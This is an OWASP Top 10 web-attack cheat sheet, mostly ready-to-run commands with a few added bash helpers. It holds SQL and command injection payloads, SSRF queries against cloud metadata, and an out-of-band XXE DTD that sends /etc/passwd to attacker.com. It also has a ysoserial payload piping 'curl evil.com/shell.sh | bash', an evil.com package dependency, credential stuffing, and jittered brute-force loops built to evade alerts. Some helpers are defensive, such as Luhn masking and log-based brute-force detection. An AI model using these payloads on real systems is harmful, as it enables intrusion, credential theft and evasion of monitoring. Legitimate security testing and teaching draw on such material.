Where to find: Across entire application after authentication
Theory: Controls who can access what; broken when users can access resources they shouldn't.
# 1. IDOR (Insecure Direct Object Reference) Testing
# Change numeric IDs in URLs/parameters
curl "https://site.com/user/1337"   # Try neighbouring numbers (1336, 1338...) with a low-privilege session; 200 plus another user's data = IDOR
curl "https://site.com/api/user?id=1001"
curl "https://site.com/download?file=../../etc/passwd"   # File reference: path traversal rather than a numeric ID, same root cause (client-chosen object reference, no ownership check)
# 2. Missing Function Level Access Control
# Access admin endpoints as regular user
curl -H "User-Type: admin" https://site.com/admin/deleteAll
curl -c cookies.txt "https://site.com/login" -d "user=normal&pass=pass"
curl -b cookies.txt "https://site.com/admin/panel"
# 3. Parameter Tampering
# Modify user_id parameter
https://site.com/account?user_id=ATTACKER_ID
POST /update_profile HTTP/1.1
Content-Type: application/json

{"user_id": "victim_id", "email": "attacker@evil.com"}
Attack Surface: URL parameters, API endpoints, file references, UUIDs, session tokens, HTTP headers.
Where to find: Data transmission & storage points
Theory: Sensitive data exposure due to weak/no encryption.
# 1. Check for Cleartext Transmission
curl -v -o /dev/null https://site.com 2>&1 | grep -E "SSL connection|TLSv"   # Negotiated TLS version and cipher; leave -k off, certificate errors are findings
nmap --script ssl-enum-ciphers -p 443 target.com   # Full protocol/cipher inventory with strength grades
openssl s_client -connect target.com:443 -tls1   # Test old protocols (-tls1_1 too); a successful handshake means they are still enabled
# 2. Credit Card/SSN Detection
grep -rE "\b[0-9]{13,16}\b" /var/www/html/   # Digit runs that may be stored card numbers; expect false positives (order IDs, timestamps)
tcpdump -i eth0 -A -l | grep -iE "password|ssn|credit"   # -l line-buffers so matches appear live; only shows anything on unencrypted traffic
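The bare 16-digit grep above also matches order numbers, timestamps and tracking IDs. The following is an added example (my code, not part of the original cheat sheet) that runs every candidate through the Luhn mod-10 check so only values that can actually be card PANs are reported, and masks them so the finding itself does not become a new leak. The log lines in the usage comment are constructed; GNU grep is assumed for the \b word boundary.

```bash
#!/usr/bin/env bash
# Added example: Luhn-filtered card number detection over arbitrary text.
# Sample input in the usage comment is constructed.

# Luhn mod-10: returns 0 (true) when the digit string passes.
luhn_ok() {
    local n=$1 i d sum=0 dbl=0
    i=${#n}
    while [ "$i" -gt 0 ]; do
        d=$(printf '%s' "$n" | cut -c"$i")   # walk from the rightmost digit
        i=$((i - 1))
        if [ "$dbl" -eq 1 ]; then            # double every second digit
            d=$((d * 2))
            [ "$d" -gt 9 ] && d=$((d - 9))
        fi
        sum=$((sum + d))
        dbl=$((1 - dbl))
    done
    [ $((sum % 10)) -eq 0 ]
}

# Read text (files, HTTP responses, tcpdump -A output) on stdin; print each
# Luhn-valid 13-19 digit run as "first6******last4".
find_pans() {
    grep -oE '\b[0-9]{13,19}\b' | while read -r cand; do
        if luhn_ok "$cand"; then
            printf '%s******%s\n' "$(printf '%s' "$cand" | cut -c1-6)" \
                "$(printf '%s' "$cand" | cut -c$((${#cand} - 3))-)"
        fi
    done
}

# Usage (constructed sample; 1234567890123456 fails Luhn, 4111111111111111 passes):
#   printf 'order=1234567890123456 card=4111111111111111\n' | find_pans
#   grep -r "" /var/www/html | find_pans
#   tcpdump -i eth0 -A -l | find_pans
```

Luhn does not prove a value is a card number (it is a checksum, not a secret), but it removes the bulk of random digit runs; anything left should be checked against known BIN ranges and against where it was found.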
# 3. Weak Algorithm Detection
# Check JWT tokens in cookies
JWT="eyJhbGciOiJIUzI1NiIs..."
echo "$JWT" | cut -d. -f1 | base64 -d 2>/dev/null; echo   # Header only: piping the whole token into base64 -d fails on the dots and on the missing padding
echo "$JWT" | cut -d. -f2 | base64 -d 2>/dev/null; echo   # Payload (claims)
# Look for: HS256 (guessable secret), "none" (unsigned), RS256 (try alg confusion: re-sign as HS256 with the public key), short RSA keys
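Decoding a JWT by hand trips over three things: the dot separators, the URL-safe alphabet (- and _) and the stripped padding. The functions below are an added example (my code, not from the original page) that handle all three, pull out the alg, and say what to try next for each algorithm family. The tokens in the usage comment are constructed test values; hashcat mode 16500 is its JWT mode.

```bash
#!/usr/bin/env bash
# Added example: dependency-free JWT decoding and algorithm triage.

# base64url -> bytes: restore the standard alphabet and the padding.
b64url_decode() {
    local s pad
    s=$(printf '%s' "$1" | tr '_-' '/+')
    pad=$(( (4 - ${#s} % 4) % 4 ))
    while [ "$pad" -gt 0 ]; do s="$s="; pad=$((pad - 1)); done
    printf '%s' "$s" | base64 -d
}

# Segment 1 = header, 2 = payload; 3 is the raw signature, not decoded here.
jwt_header()  { b64url_decode "$(printf '%s' "$1" | cut -d. -f1)"; }
jwt_payload() { b64url_decode "$(printf '%s' "$1" | cut -d. -f2)"; }

# Pull "alg" out of the header JSON with sed (no jq dependency).
jwt_alg() {
    jwt_header "$1" | sed -n 's/.*"alg"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p'
}

# What to test next for each algorithm family.
jwt_triage() {
    case "$(jwt_alg "$1" | tr '[:upper:]' '[:lower:]')" in
        none)
            echo "none: unsigned token; strip the signature and replay with a changed payload" ;;
        hs256|hs384|hs512)
            echo "HMAC: brute-force the secret offline (hashcat -m 16500); weak or default secrets are common" ;;
        rs256|rs384|rs512|ps*|es*)
            echo "asymmetric: check key size, and try re-signing with HS256 using the server's public key as the secret (alg confusion)" ;;
        *)
            echo "unrecognised alg: inspect the header by hand" ;;
    esac
}

# Usage (constructed token: {"alg":"none"} header, unsigned):
#   T='eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.'
#   jwt_header "$T"; echo; jwt_payload "$T"; echo; jwt_triage "$T"
```

Run it against every token-shaped cookie and Authorization header you see; a header that decodes but has no alg, or a payload with an exp far in the future, is also worth noting.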
# 4. Manual Testing
# Force HTTP when HTTPS available
curl -sI -L http://site.com/login   # Should redirect to https; a login form served over http sends credentials in cleartext
# Test HSTS missing
curl -sI https://site.com | grep -i Strict-Transport-Security   # No output = no HSTS, so the first http request stays downgradable
Attack Surface: Login pages, payment forms, API endpoints, cookies, data exports, backup files.
Where to find: User input fields, parameters, file uploads
Theory: Untrusted data sent to interpreter executes as commands.
# 1. Basic Testing
curl -G "https://site.com/products" --data-urlencode "id=1' OR '1'='1"   # -G plus --data-urlencode builds the query string and encodes quotes/spaces (a raw space in the URL gets the request rejected)
curl "https://site.com/search" --data-urlencode "query=' UNION SELECT null-- -"   # MySQL needs a space after --; "-- -" keeps it even if trailing whitespace is trimmed
# 2. Time-Based Blind SQLi
curl -G -o /dev/null -w "%{time_total}s\n" "https://site.com/product" --data-urlencode "id=1' AND SLEEP(5)-- -"   # ~5 s response = injectable (MySQL); compare against SLEEP(0)
curl -o /dev/null -w "%{time_total}s\n" "https://site.com/login" --data-urlencode "user=admin' AND IF(1=1,SLEEP(5),0)-- -"
# 3. Automated Tools
sqlmap -u "https://site.com/product?id=1" --dbs
sqlmap -u "https://site.com/search" --data="query=test" --batch
# 4. Second-Order Injection (stored)
# Register with: username = admin'-- -
# Then use "forgot password" on that account: if the stored username is concatenated into the password UPDATE unescaped, the WHERE clause becomes username='admin' and the comment swallows the rest, so admin's password is the one reset
Attack Surface: Login forms, search boxes, product filters, URL parameters, cookie values.
# 1. Basic Command Injection
curl -G "https://site.com/ping" --data-urlencode "ip=127.0.0.1;whoami"   # Encode the payload: a raw ; or space in the URL may be split off or rejected before it reaches the shell
curl -G "https://site.com/export" --data-urlencode "name=test.pdf;cat /etc/passwd"
# 2. Using Special Characters
;  # Command separator (Linux)
&  # Runs both commands (Windows/Linux); && only if the first succeeds, || only if it fails
|  # Pipe output into your command
`cmd`  # Backtick substitution (Linux shells)
$(cmd)  # Command substitution; when spaces are filtered use ${IFS}, when ; and | are filtered try %0a (newline)
# 3. Blind Command Injection
curl -G -o /dev/null -w "%{time_total}s\n" "https://site.com/ping" --data-urlencode 'ip=127.0.0.1$(sleep 5)'   # Single quotes keep $(...) from running on your own shell; a ~5 s delay confirms execution
curl -G "https://site.com/api/convert" --data-urlencode 'url=https://evil.com/`id`'   # Same reason: inside double quotes the backticks would run id locally; watch your web/DNS logs for the callback
Attack Surface: System integration features, file uploads, admin panels, ping tools, report generators.
Where to find: Business logic flows, workflow sequences
Theory: Missing/ineffective security controls in design phase.
# 1. Business Logic Bypass
# Rate limiting bypass: does vote 1000 still get a 200?
for i in {1..1000}; do
  curl -s -o /dev/null -w "$i %{http_code}\n" -X POST "https://site.com/vote" -d "poll_id=1&choice=attacker"
done
# 2. Workflow Bypass
# Skip steps in multi-step process
curl -X POST "https://site.com/checkout/step4" # Skip steps 1-3
# 3. Price Manipulation
# Intercept and modify price parameter
POST /cart/checkout HTTP/1.1
{"items":[{"id":1,"price":0.01,"quantity":10}]}
# 4. Negative Testing
# Create user with negative balance
curl -X POST "https://site.com/transfer" -d "amount=-1000"   # If only an upper bound is checked, a negative transfer moves money the other way
# Buy negative quantity
curl "https://site.com/add-to-cart?id=1&quantity=-5"   # A negative line item reduces the order total
Attack Surface: Shopping carts, voting systems, multi-step forms, financial transactions, booking systems.
Where to find: Default pages, debug endpoints, headers
Theory: Improperly configured security settings.
# 1. Directory Listing Enabled
curl "https://site.com/images/" # Lists files
curl "https://site.com/.git/" # Git repo exposed
curl "https://site.com/backup/" # Backup files
# 2. Default Credentials
hydra -l admin -p admin ftp://target.com
hydra -L users.txt -P passwords.txt "http-post-form://site.com/login:user=^USER^&pass=^PASS^:F=incorrect"   # http-post-form needs the failure (F=) or success (S=) string as the third field
# 3. Verbose Error Messages
curl "https://site.com/user/'"
# Look for: stack traces, SQL errors, internal paths
# 4. Unnecessary Services/Ports
nmap -sV -p- target.com
# Check for: 21/FTP, 161/SNMP, 873/rsync, 5985/WinRM
# 5. HTTP Methods Testing
curl -i -X TRACE https://site.com   # A response body echoing your request (cookies included) = TRACE enabled
curl -i -X PUT https://site.com/test.html -d "malicious"   # 201/204 = unauthenticated file write
curl -i -X OPTIONS https://site.com   # The Allow: header lists the enabled methods
Attack Surface: Admin interfaces, configuration files, error pages, HTTP headers, exposed ports.
Where to find: JavaScript libraries, server frameworks, CMS plugins
Theory: Using components with known vulnerabilities.
# 1. Version Detection
curl -s https://site.com | grep -i "jquery\|react\|angular"
curl -I https://site.com | grep -i "server\|x-powered-by"
whatweb https://site.com # Automated fingerprinting
# 2. Known Exploits
# Search Exploit-DB for specific versions
searchsploit wordpress 5.0
searchsploit apache 2.4
# 3. Dependency Checking
# Check package.json, composer.json, requirements.txt
curl "https://site.com/package.json"
curl "https://site.com/composer.lock"
# 4. CMS/Plugin Scanning
wpscan --url https://site.com --enumerate p,t,u
droopescan scan drupal -u https://site.com
Attack Surface: JavaScript files, server headers, README files, login pages with framework branding.
Where to find: Login, registration, password reset, session management
Theory: Weak authentication mechanisms allow credential bypass.
# 1. Credential Stuffing
# Use breached password lists
hydra -L emails.txt -P passwords.txt https-post-form://site.com/login:"username=^USER^&password=^PASS^:F=incorrect"
# 2. Weak Password Policy Testing
curl -X POST "https://site.com/register" -d "user=test&pass=123456"
curl -X POST "https://site.com/register" -d "user=test&pass=password"
curl -X POST "https://site.com/register" -d "user=admin&pass=admin"
# 3. Password Reset Abuse
# Predictable reset tokens
curl "https://site.com/reset?token=000000"
curl "https://site.com/reset?token=$(date +%Y%m%d)"
# 4. Session Hijacking
# Non-random session IDs
for i in {1..100}; do
  curl -s -o /dev/null -c "cookie$i.txt" "https://site.com/login" -d "user=test&pass=test"
done
# Compare session IDs across the cookie files: sequential, timestamp-derived or short values are predictable
# 5. Brute Force Protection Bypass
# Add X-Forwarded-For header rotation
curl -H "X-Forwarded-For: 1.2.3.$((RANDOM % 256))" "https://site.com/login" -d "user=admin&pass=guess"   # $RANDOM alone gives 0-32767, not a valid octet; only helps if lockout keys on a trusted XFF
Attack Surface: Login forms, password reset pages, registration forms, session cookies, JWT tokens.
Where to find: Update mechanisms, CI/CD pipelines, deserialization
Theory: Code/infra integrity failures allow unauthorized modifications.
# 1. Insecure Deserialization
# Java/PHP/.NET object injection
curl -X POST "https://site.com/api/user" -H "Content-Type: application/x-java-serialized-object" --data-binary "@payload.ser"   # Java streams start AC ED 00 05
curl "https://site.com/profile?data=rO0ABXcEAAAA"   # Base64 "rO0AB" = AC ED 00 05, a Java serialized object passed in a parameter
# 2. Code/Update Integrity
# Check if updates are over HTTP
curl -I http://updates.site.com/latest.zip
# Try to upload malicious update
curl -X PUT http://dev.site.com/upload -F "file=@backdoor.php"
# 3. Dependency Substitution
# Poison package repositories
# In package.json: "dep": "http://evil.com/malicious-package.tgz"
# 4. Deserialization Testing Tools
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "cmd.exe /c calc.exe"   # .NET (ysoserial.net): its gadget names differ from the Java tool's
java -jar ysoserial.jar CommonsCollections1 'curl evil.com/shell.sh | bash' > payload.ser   # Java: send payload.ser with the POST above
Attack Surface: API endpoints accepting serialized objects, update endpoints, build servers, package managers.
Where to find: Log files, monitoring systems, alert mechanisms
Theory: Lack of logging enables undetected attacks.
# 1. Test Log Injection
curl -G "https://site.com/search" --data-urlencode "q=<script>alert(1)</script>"   # Lands in the logs; fires in a log viewer that renders entries as HTML
curl "https://site.com/user?name=admin%0a%5BSUCCESS%5D%20Password%20changed"   # %0a = newline, forges a fake log line (a literal \n in the URL is sent as two characters)
# 2. Evade Logging
# Use encoded payloads
curl "https://site.com/admin'%20OR%20'1'%3D'1"
# Slow attacks to avoid rate-based detection
while read -r pass; do
  curl -s -o /dev/null -w "$pass %{http_code}\n" "https://site.com/login" -d "user=admin&pass=$pass"
  sleep 30
done < passwords.txt   # read -r keeps passwords containing spaces intact; for ... $(cat) would split them
# 3. Log File Access
curl "https://site.com/logs/access.log"
curl --path-as-is "https://site.com/../var/log/apache2/error.log"   # Without --path-as-is curl normalises /../ away before sending
# 4. Time-Based Attack Evasion
# Stagger requests over long period
while read -r pass; do
  curl -s "https://site.com/login" -d "user=admin&pass=$pass" &
  sleep $((RANDOM % 60 + 30))   # 30-90 s jitter defeats fixed-window rate alerts
done < passwords.txt
Attack Surface: All user inputs, especially those that might be logged (login attempts, search queries, form submissions).
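The two slow loops above beat any alert that counts failures per minute. The defender's answer, added here as an example (my code, not the original page's), is to count per account over a long window and to count distinct accounts per source, which catches both a 30-60 s spaced brute force and a password spray. The log lines are constructed in a made-up "ts login user=... result=... src=..." format; adapt the field parsing to your own log format.

```bash
#!/usr/bin/env bash
# Added example: detection logic that is indifferent to request spacing.

# Constructed sample: one source hammering admin slowly, another trying one
# password against several accounts.
AUTH_LOG='2024-05-01T10:00:00Z login user=admin result=fail src=203.0.113.5
2024-05-01T10:00:45Z login user=admin result=fail src=203.0.113.5
2024-05-01T10:01:40Z login user=alice result=ok src=198.51.100.7
2024-05-01T10:02:31Z login user=admin result=fail src=203.0.113.5
2024-05-01T10:03:20Z login user=admin result=fail src=203.0.113.5
2024-05-01T10:04:15Z login user=admin result=fail src=203.0.113.5
2024-05-01T10:05:09Z login user=admin result=fail src=203.0.113.5
2024-05-01T10:06:02Z login user=bob result=fail src=198.51.100.9
2024-05-01T10:07:14Z login user=carol result=fail src=198.51.100.9
2024-05-01T10:08:27Z login user=dave result=fail src=198.51.100.9'

# Failures per account over the whole input (hours or days of log);
# print "user count" for every account at or above the threshold in $1.
slow_bruteforce_alert() {
    awk -v thr="$1" '
        /result=fail/ {
            user = ""
            for (i = 1; i <= NF; i++) if ($i ~ /^user=/) user = substr($i, 6)
            n[user]++
        }
        END { for (u in n) if (n[u] >= thr) print u, n[u] }'
}

# Distinct accounts that failed from one source; print "src count" for
# every source at or above the threshold in $1 (password spraying).
password_spray_alert() {
    awk -v thr="$1" '
        /result=fail/ {
            user = src = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^user=/) user = substr($i, 6)
                if ($i ~ /^src=/)  src  = substr($i, 5)
            }
            if (!((src, user) in seen)) { seen[src, user] = 1; n[src]++ }
        }
        END { for (s in n) if (n[s] >= thr) print s, n[s] }'
}

# Usage:
#   printf '%s\n' "$AUTH_LOG" | slow_bruteforce_alert 5
#   printf '%s\n' "$AUTH_LOG" | password_spray_alert 3
```

Neither rule cares how far apart the attempts are, which is the property the X-Forwarded-For rotation and the sleep loops are trying to exploit; rotating the source only defeats the second rule, not the first.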
Where to find: URL parameters, webhooks, import features
Theory: Application fetches external resources based on user input.
# 1. Basic SSRF Testing
curl "https://site.com/fetch?url=http://169.254.169.254/latest/meta-data/"
curl "https://site.com/export?url=file:///etc/passwd"
curl "https://site.com/webhook?url=http://attacker.com/steal"
# 2. Advanced SSRF Bypasses
# Using encoding
curl "https://site.com/load?url=http://0177.0.0.1/" # Octal
curl "https://site.com/load?url=http://0x7f.0x0.0x0.0x1" # Hex
curl "https://site.com/load?url=http://127.1" # Short notation
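The three bypasses above are instances of one trick: inet_aton accepts many spellings of the same address, while a denylist usually compares the literal string. The function below is an added example (my code, not from the original page) that generates the full set for any IPv4 address so each form can be dropped into the url= parameter; it goes slightly beyond the page by also emitting the decimal, zero-padded and three-part forms.

```bash
#!/usr/bin/env bash
# Added example: alternative IPv4 spellings for SSRF denylist bypass.
ip_variants() {
    local ip=$1 rest a b c d dec
    rest=$ip
    a=${rest%%.*}; rest=${rest#*.}
    b=${rest%%.*}; rest=${rest#*.}
    c=${rest%%.*}; d=${rest#*.}
    dec=$(( (a << 24) | (b << 16) | (c << 8) | d ))
    printf 'dotted   %s\n'   "$ip"
    printf 'decimal  %d\n'   "$dec"                            # http://2130706433/
    printf 'hex      0x%08x\n' "$dec"                          # http://0x7f000001/
    printf 'dothex   0x%x.0x%x.0x%x.0x%x\n' "$a" "$b" "$c" "$d"
    printf 'dotoct   0%o.0%o.0%o.0%o\n' "$a" "$b" "$c" "$d"    # leading 0 = octal for inet_aton
    # 2- and 3-part forms: the last number fills all remaining octets
    printf 'short    %s.%d\n'    "$a" "$(( (b << 16) | (c << 8) | d ))"
    printf 'short3   %s.%s.%d\n' "$a" "$b" "$(( (c << 8) | d ))"
    # Zero padding: glibc reads 0177 as octal, other parsers reject it or read
    # decimal; that disagreement between validator and fetcher is the bug
    printf 'padded   %03d.%03d.%03d.%03d\n' "$a" "$b" "$c" "$d"
}
# Usage: ip_variants 169.254.169.254
```

The variants that matter most are the ones where the validating library and the fetching library disagree, so test each form against the actual endpoint rather than against a local curl.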
# 3. Cloud Metadata Access
# AWS (IMDSv1; IMDSv2 needs a PUT to fetch a token first, so a GET-only SSRF gets 401)
curl "https://site.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# GCP (v1 requires the request header "Metadata-Flavor: Google", so this only works if the SSRF lets you control headers)
curl "https://site.com/proxy?url=http://metadata.google.internal/computeMetadata/v1/"
# Azure (requires the header "Metadata: true"; encode the inner ? as %3F or api-version becomes a parameter of /proxy instead)
curl "https://site.com/proxy?url=http://169.254.169.254/metadata/instance%3Fapi-version=2017-04-02"
# 4. Port Scanning via SSRF
for port in {1..1000}; do
  curl -s -o /dev/null -w "$port %{http_code} %{size_download} %{time_total}\n" "https://site.com/fetch?url=http://127.0.0.1:$port/"
done   # There is no "connected" string to grep for: open and closed ports differ in status code, error body size or response time
Attack Surface: Image uploads, document processors, webhook configurations, API integrations, PDF generators.
Where to find: XML parsers, file uploads, SOAP endpoints
Theory: Poorly configured XML parser processes external entities.
# 1. Basic XXE Payload
curl -X POST "https://site.com/xml-parser" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
# 2. XXE for SSRF
curl -X POST "https://site.com/upload" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>'
# 3. Blind XXE with Out-of-Band
curl -X POST "https://site.com/parse" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]><root/>'
# evil.dtd (hosted on attacker.com):
# <!ENTITY % file SYSTEM "file:///etc/passwd">
# <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
# %eval;
# %exfil;
# The nested parameter entity must be written &#x25; not %, or the DTD fails to parse. Newlines in the file break the URL, so prefer single-line targets (or php://filter base64 on PHP) and read the ?x= value from attacker.com's access log
Attack Surface: XML-based APIs, document uploads (DOCX, PDF), SOAP services, RSS readers.
# Comprehensive Scan
nikto -h https://site.com
nuclei -u https://site.com -t /nuclei-templates/
# API Testing
ffuf -u https://site.com/api/FUZZ -w api_endpoints.txt
arjun -u https://site.com/api/user --get
# Auth Testing
crackmapexec smb target.com -u users.txt -p passwords.txt
patator http_fuzz url=https://site.com/login method=POST body='user=FILE0&pass=FILE1' 0=users.txt 1=passwords.txt
# Custom Script for OWASP Top 10
#!/bin/bash
URL=$1
echo "Testing $URL for OWASP Top 10..."
# Injection
sqlmap -u "$URL?id=1" --batch --level=1
# XSS
xsstrike -u "$URL/search?q=test"
# SSRF
curl -s "$URL/fetch?url=http://169.254.169.254/latest/meta-data/" | grep -i "ami\|instance"
# IDOR: a 200 whose body size differs from your own record deserves a manual look
for i in {1000..1100}; do curl -s -o /dev/null -w "$i %{http_code} %{size_download}\n" "$URL/user/$i"; done